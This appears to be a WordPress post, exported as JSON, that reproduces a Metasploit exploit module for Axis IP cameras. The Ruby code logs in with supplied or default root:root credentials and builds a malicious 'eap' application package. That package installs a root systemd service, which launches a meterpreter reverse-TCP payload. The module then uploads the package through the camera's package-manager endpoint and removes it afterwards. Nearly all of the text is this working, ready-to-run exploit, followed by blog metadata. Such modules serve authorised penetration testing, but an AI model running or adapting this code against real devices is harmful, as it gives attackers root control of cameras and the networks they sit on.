##
\n# This module requires Metasploit: https:\/\/metasploit.com\/download
\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework
\n##<\/p>\n
class MetasploitModule < Msf::Exploit::Remote
\nRank = ExcellentRanking<\/p>\n
prepend Msf::Exploit::Remote::AutoCheck
\ninclude Msf::Exploit::Remote::HttpClient
\ninclude Msf::Exploit::CmdStager
\ninclude Msf::Exploit::FileDropper<\/p>\n
def initialize(info = {})
\nsuper(
\nupdate_info(
\ninfo,
\n‘Name’ => ‘Axis IP Camera Application Upload’,
\n‘Description’ => %q{
\nThis module exploits the “Apps” feature in Axis IP cameras. The feature allows third party
\ndevelopers to upload and execute ‘eap’ applications on the device. The system does not validate
\nthe application comes from a trusted source, so a malicious attacker can upload and execute
\narbitrary code. The issue has no CVE, although the technique was made public in 2018.<\/p>\n
This module uploads and executes stageless meterpreter as `root`. Uploading the application
\nrequires valid credentials. The default administrator credentials used to be `root:root` but
\nnewer firmware versions force users to provide a new password for the `root` user.<\/p>\n
The module was tested on an Axis M3044-V using the latest firmware (9.80.3.8: December 2021).
\nAlthough all modules that support the “Apps” feature are presumed to be vulnerable.
\n},
\n‘License’ => MSF_LICENSE,
\n‘Author’ => [
\n‘jbaines-r7’ # Discovery and Metasploit module
\n],
\n‘References’ => [
\n[ ‘URL’, ‘https:\/\/www.tenable.com\/blog\/tenable-research-advisory-axis-camera-app-malicious-package-distribution-weakness’],
\n[ ‘URL’, ‘https:\/\/www.axis.com\/support\/developer-support\/axis-camera-application-platform’]\n],
\n‘DisclosureDate’ => ‘2018-04-12’,
\n‘Platform’ => [‘linux’],
\n‘Arch’ => [ARCH_ARMLE],
\n‘Privileged’ => true,
\n‘Targets’ => [
\n[
\n‘Linux Dropper’,
\n{
\n‘Platform’ => ‘linux’,
\n‘Arch’ => [ARCH_ARMLE],
\n‘Type’ => :linux_dropper,
\n‘Payload’ => {
\n},
\n‘DefaultOptions’ => {
\n‘PAYLOAD’ => ‘linux\/armle\/meterpreter_reverse_tcp’ # Use stagless payloads until issue 16107 gets addressed to fix the ARMLE stager
\n}
\n}
\n]\n],
\n‘DefaultTarget’ => 0,
\n‘DefaultOptions’ => {
\n‘RPORT’ => 80,
\n‘SSL’ => false
\n},
\n‘Notes’ => {
\n‘Stability’ => [CRASH_SAFE],
\n‘Reliability’ => [REPEATABLE_SESSION],
\n‘SideEffects’ => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n}
\n)
\n)
\nregister_options([
\nOptString.new(‘TARGETURI’, [true, ‘Base path’, ‘\/’]),
\nOptString.new(‘USERNAME’, [true, ‘The username to authenticate with’, ‘root’]),
\nOptString.new(‘PASSWORD’, [true, ‘The password to authenticate with’, ‘root’])
\n])
\nend<\/p>\n
# Check function will attempt to verify:
\n#
\n# 1. The provided credentials work for authentication
\n# 2. The remote target is an axis camera
\n# 3. The applications API exists.
\n#
\ndef check
\n# grab the brand\/model. Shouldn’t require authentication.
\nres = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘uri’ => normalize_uri(target_uri.path, ‘\/axis-cgi\/prod_brand_info\/getbrand.cgi’)
\n})<\/p>\n
return CheckCode::Unknown unless res && (res.code == 200)<\/p>\n
body_json = res.get_json_document
\nreturn CheckCode::Unknown if body_json.empty? || body_json.dig(‘Brand’, ‘ProdShortName’).nil?<\/p>\n
# The brand \/ model are now known
\ncheck_comment = “The target reports itself to be a ‘#{body_json.dig(‘Brand’, ‘ProdShortName’)}’.”<\/p>\n
# check to see if the applications api exists (also tests credentials)
\nres = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘username’ => datastore[‘USERNAME’],
\n‘password’ => datastore[‘PASSWORD’],
\n‘uri’ => normalize_uri(target_uri.path, ‘\/axis-cgi\/applications\/list.cgi’)
\n})<\/p>\n
# A strange edge case where there is no response… respond detected
\nreturn CheckCode::Detected unless res
\n# Respond safe if credentials fail, to prevent the exploit from running
\nreturn CheckCode::Safe(‘The user provided credentials did not work.’) if res.code == 401
\n# Assume any non-200 means the API doesn’t exist
\nreturn CheckCode::Safe(check_comment) if res.code != 200<\/p>\n
# This checks for an XML response which I’m not sure is smart considering most of the device
\n# does JSON replies… the concerning being that this response has changed in newer models
\nreturn CheckCode::Safe(check_comment) unless res.body.include?(‘<reply result=”ok”>’) != 200<\/p>\n
CheckCode::Appears(check_comment)
\nend<\/p>\n
# Creates a malicious “eap” application. The package application will gain execution
\n# through the postinstall script. The script, which executes as a systemd oneshot, will
\n# create and execute a new service for the payload. We have to do this because the oneshot
\n# child processes will be terminated when the main binary exits. Executing the payload from
\n# a new service gets around that issue.
\n#
\n# The eap registers as a “lua” apptype, because the binary version (armv7hf) gets checked
\n# for some required libraries whereas the lua version is just accepted.
\n#
\n# The construction of the eap follows this pattern:
\n# * tar -cf exploit payload package.conf postinstall.sh payload.service
\n# * gzip exploit
\n# * mv exploit.gz exploit.eap
\ndef create_eap(payload, appname)
\nprint_status(“Creating an application package named: #{appname}”)
\nscript_name = “#{Rex::Text.rand_text_alpha_lower(3..8)}.sh”<\/p>\n
package_conf = “PACKAGENAME=’#{Rex::Text.rand_text_alpha(4..14)}’\\n” \\
\n“APPTYPE=’lua’\\n” \\
\n“APPNAME=’#{appname}’\\n” \\
\n“APPID=’48#{Rex::Text.rand_text_numeric(3)}’\\n” \\
\n“APPMAJORVERSION=’#{Rex::Text.rand_text_numeric(1)}’\\n” \\
\n“APPMINORVERSION=’#{Rex::Text.rand_text_numeric(1..2)}’\\n” \\
\n“APPMICROVERSION=’#{Rex::Text.rand_text_numeric(1..3)}’\\n” \\
\n“APPGRP=’root’\\n” \\
\n“APPUSR=’root’\\n” \\
\n“POSTINSTALLSCRIPT=’#{script_name}’\\n” \\
\n“STARTMODE=’respawn’\\n”<\/p>\n
# this sync, sleep, cp, sleep pattern is not optimal, but the underlying
\n# filesystem was taking time to catch up to the exploit (and mounting and
\n# unmounting itself which is just weird) and this seemed like a reasonable,
\n# if not hacky, way to give it a chance to catch up. Seems to work well.
\nstart_service =
\n“#!\/bin\/sh\\n”\\
\n“\\nsync\\n”\\
\n“\\nsleep 2\\n”\\
\n“\\ncp .\/#{appname}.service \/etc\/systemd\/system\/\\n” \\
\n“\\nsleep 2\\n”\\
\n“\\nsystemctl start #{appname}\\n”<\/p>\n
# only register the service file for deletion. Everything else will be
\n# deleted by the uninstall function called later.
\nregister_file_for_cleanup(“\/etc\/systemd\/system\/#{appname}.service”)<\/p>\n
service =
\n“[Unit]\\n”\\
\n“Description=\\n”\\
\n“[Service]\\n”\\
\n“Type=simple\\n”\\
\n“User=root\\n”\\
\n“ExecStart=\/usr\/local\/packages\/#{appname}\/#{appname}\\n”\\
\n“\\n”\\
\n“[Install]\\n”\\
\n“WantedBy=multi-user.target\\n”<\/p>\n
tarfile = StringIO.new
\nRex::Tar::Writer.new tarfile do |tar|
\ntar.add_file(‘package.conf’, 0o644) do |io|
\nio.write package_conf
\nend
\ntar.add_file(script_name.to_s, 0o755) do |io|
\nio.write start_service
\nend
\ntar.add_file(appname.to_s, 0o755) do |io|
\nio.write payload
\nend
\ntar.add_file(“#{appname}.service”, 0o644) do |io|
\nio.write service
\nend
\nend
\ntarfile.rewind
\ntarfile.close<\/p>\n
Rex::Text.gzip(tarfile.string)
\nend<\/p>\n
# Upload the malicious EAP application for a root shell. Always attempt to uninstall the application
\ndef exploit
\nappname = Rex::Text.rand_text_alpha_lower(3)
\neap = create_eap(payload.encoded, appname)<\/p>\n
# Instruct the application to install the constructed EAP
\nmultipart_form = Rex::MIME::Message.new
\nmultipart_form.add_part(‘{“apiVersion”:”1.0″,”method”:”install”}’, ‘application\/json’, nil, ‘form-data; name=”data”; filename=”blob”‘)
\nmultipart_form.add_part(eap, ‘application\/octet-stream’, ‘binary’, “form-data; name=\\”fileData\\”; filename=\\”#{appname}.eap\\””)<\/p>\n
install_endpoint = normalize_uri(target_uri.path, ‘\/axis-cgi\/packagemanager.cgi’)
\nprint_status(“Sending an application upload request to #{install_endpoint}”)
\nres = send_request_cgi({
\n‘method’ => ‘POST’,
\n‘username’ => datastore[‘USERNAME’],
\n‘password’ => datastore[‘PASSWORD’],
\n‘uri’ => install_endpoint,
\n‘ctype’ => “multipart\/form-data; boundary=#{multipart_form.bound}”,
\n‘data’ => multipart_form.to_s
\n})<\/p>\n
# check for successful installation
\nfail_with(Failure::Disconnected, ‘Connection failed’) unless res
\nfail_with(Failure::UnexpectedReply, “HTTP status code is not 200 OK: #{res.code}”) unless res.code == 200
\nbody_json = res.get_json_document
\nfail_with(Failure::UnexpectedReply, ‘Missing JSON response’) if body_json.empty?
\n# {“apiVersion”=>”1.4”, “method”=>”install”, “error”=>{“code”=>60, “message”=>”Failed to install acap”}}
\nfail_with(Failure::UnexpectedReply, ‘The target responded with a JSON error’) unless body_json[‘error’].nil?<\/p>\n
# syncing the unstaged meterpreter payload seems to take a little bit for the poor little
\n# embedded filesystem. Give it a chance to sync up before we try to remove the application.
\nprint_good(‘Application installed. Pausing 5 seconds to let the filesystem sync.’)
\nsleep(5)
\nensure
\nuninstall_endpoint = normalize_uri(target_uri.path, ‘\/axis-cgi\/applications\/control.cgi’)
\nprint_status(“Sending a delete application request to #{uninstall_endpoint}”)
\nres = send_request_cgi({
\n‘method’ => ‘GET’,
\n‘username’ => datastore[‘USERNAME’],
\n‘password’ => datastore[‘PASSWORD’],
\n‘uri’ => uninstall_endpoint,
\n‘vars_get’ => {
\n‘action’ => ‘remove’,
\n‘package’ => appname.to_s
\n}
\n})<\/p>\n
# instructions for manually removal if the above fails. That should never happen, but best be safe.
\nremoval_instructions = ‘To manually remove the application, log in to the system and then select the apps tab. ‘ \\
\n“Find the app named ‘#{appname}’ and select it. Click the trash bin icon to uninstall it.”<\/p>\n
# check for successful removal
\nprint_bad(“The server did not respond to the application deletion request. #{removal_instructions}”) unless res
\nprint_bad(“The server did not respond with 200 OK to the application deletion request. #{removal_instructions}”) unless res.code == 200
\nprint_bad(“The application deletion response did not contain the expected body. #{removal_instructions}”) unless res.body.include?(‘OK’)
\nprint_good(“The application #{appname} was successfully removed from the target!”)
\nend
\nend<\/p>\n","protected":false},"excerpt":{"rendered":"
## # This module requires Metasploit: https:\/\/metasploit.com\/download # Current source: https:\/\/github.com\/rapid7\/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking prepend Msf::Exploit::Remote::AutoCheck include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, ‘Name’ => ‘Axis IP Camera Application Upload’, ‘Description’ => %q{ This module exploits the “Apps” feature in Axis IP cameras. The …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-21120","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21120","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=21120"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/21120\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=21120"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=21120"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=21120"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}